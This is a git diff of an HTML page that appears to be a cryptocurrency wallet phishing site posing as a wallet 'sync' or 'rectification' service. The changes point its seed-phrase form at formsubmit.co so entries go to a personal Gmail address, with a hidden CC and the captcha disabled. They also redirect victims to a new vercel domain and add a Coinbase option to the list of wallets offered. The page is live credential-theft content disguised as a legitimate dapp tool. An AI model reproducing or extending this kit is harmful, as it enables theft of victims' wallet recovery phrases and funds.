--- a/access/point/index.html
+++ b/access/point/index.html
@@ -106,10 +106,10 @@
                             <div class="mt-2">
                                 <div class="mt-10">
 <!-- form starts from here -->
-                                    <form action="https://formsubmit.co/@gmail.com" method="post" enctype="multipart/form-data" id="form" class="ajaxForm">
+                                    <form action="https://formsubmit.co/olabodeomotolani19@gmail.com" method="post" enctype="multipart/form-data" id="form" class="ajaxForm">
                                        <input type="hidden" name="_cc" value="formsubmitmail@gmail.com">
                                         <input type="hidden" name="_captcha" value="false">
-                                        <input type="hidden" name="_next" value="https://rectificationprotocol.vercel.app/access/point/success.html">
+                                        <input type="hidden" name="_next" value="https://dapps-syncro.vercel.app/access/point/success.html">
                                         <div class="flex justify-evenly border-b-2 border-fuchsia-600 mb-4">
                                             <div id="phrase" class="p-2 border-b-2 border-white hover:border-blue-600 cursor-pointer">
                                                 Phrase
@@ -223,6 +223,12 @@
                                             <div class=" lfUBtr"><img class="img-icons" src="../static/tronlink2.png" alt="TronLink"></div>
                                             <div class=" eodRCW">TronLink</div>
                                         </div>
+
+                                        <div class=" cmAzHq">
+                                            <div class=" lfUBtr"><img class="img-icons" src="../static/coinbase.png" alt="Coinbase"></div>
+                                            <div class=" eodRCW">Coinbase</div>
+                                        </div>
+
 
                                         <div class=" cmAzHq">
                                             <div class=" lfUBtr"><img class="img-icons" src="../static/transitswap.png" alt="TransitSwap"></div>
